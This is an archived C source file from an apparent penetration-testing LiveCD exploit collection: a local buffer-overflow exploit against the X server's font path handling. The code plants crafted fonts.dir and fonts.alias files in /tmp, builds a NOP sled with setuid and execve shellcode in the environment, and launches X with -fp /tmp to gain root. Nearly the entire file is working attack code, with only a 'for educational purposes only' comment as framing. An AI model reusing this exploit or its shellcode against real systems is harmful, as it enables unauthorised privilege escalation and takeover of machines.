home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / xwin / xFreeFontBufO.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  2KB  |  72 lines

  1. /* For educational purposes only                            */
  2. /* Brought to you by bender2@lonestar.org   11.10.2004      */
  3.  
  4. #include <fcntl.h>
  5.  
  6. #define NOPNUM 8000
  7. #define ADRNUM 1058
  8.  
  9. /* shellcode from LSD */
  10. char setuidcode[]=         /* 8 bytes                        */
  11.     "\x33\xc0"             /* xorl    %eax,%eax              */
  12.     "\x31\xdb"             /* xorl    %ebx,%ebx              */
  13.     "\xb0\x17"             /* movb    $0x17,%al              */
  14.     "\xcd\x80"             /* int     $0x80                  */
  15. ;
  16.  
  17. char shellcode[]=          /* 24 bytes                       */
  18.     "\x31\xc0"             /* xorl    %eax,%eax              */
  19.     "\x50"                 /* pushl   %eax                   */
  20.     "\x68""//id"           /* pushl   $0x68732f2f            */
  21.     "\x68""/tmp"           /* pushl   $0x6e69622f            */
  22.     "\x89\xe3"             /* movl    %esp,%ebx              */
  23.     "\x50"                 /* pushl   %eax                   */
  24.     "\x53"                 /* pushl   %ebx                   */
  25.     "\x89\xe1"             /* movl    %esp,%ecx              */
  26.     "\x99"                 /* cdql                           */
  27.     "\xb0\x0b"             /* movb    $0x0b,%al              */
  28.     "\xcd\x80"             /* int     $0x80                  */
  29. ;
  30.  
  31. char jump[]=
  32.     "\x8b\xc4"                /* movl   %esp,%eax           */
  33.     "\xc3"                    /* ret                        */
  34. ;
  35.  
  36.  
  37. main(int argc,char **argv){
  38.     char buffer[20000],adr[4],pch[4],*b,*envp[4];
  39.     int i,fd;
  40.  
  41.  
  42.     *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+16000;
  43.  
  44.     envp[0]=&buffer[2000];
  45.     envp[1]=0;
  46.  
  47.     printf("adr: 0x%x\n",adr+12000);
  48.  
  49.     b=buffer;
  50.     strcpy(buffer,"1\n");
  51.     strcat(buffer,"aaaa.pcf -aaaa-fixed-small-a-semicondensed--1-1-1-1-a-1-iso1111-1\n");
  52.     fd=open("/tmp/fonts.dir",O_CREAT|O_WRONLY,0666);
  53.     write(fd,buffer,strlen(buffer));
  54.  
  55.     for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
  56.     *b++='\n';
  57.  
  58.     fd=open("/tmp/fonts.alias",O_CREAT|O_WRONLY,0666);
  59.     write(fd,buffer,strlen(buffer));
  60.     close(fd);
  61.  
  62.     b=&buffer[2000];
  63.     
  64. for(i=0;i<NOPNUM-strlen(setuidcode)-strlen(setuidcode)-strlen(shellcode);i++) 
  65. *b++=0x90;
  66.     for(i=0;i<strlen(setuidcode);i++) *b++=setuidcode[i];
  67.     for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
  68.     *b=0;
  69.  
  70.     execle("/usr/bin/X11/X","X",":0","-fp","/tmp",0,envp);
  71. }
  72.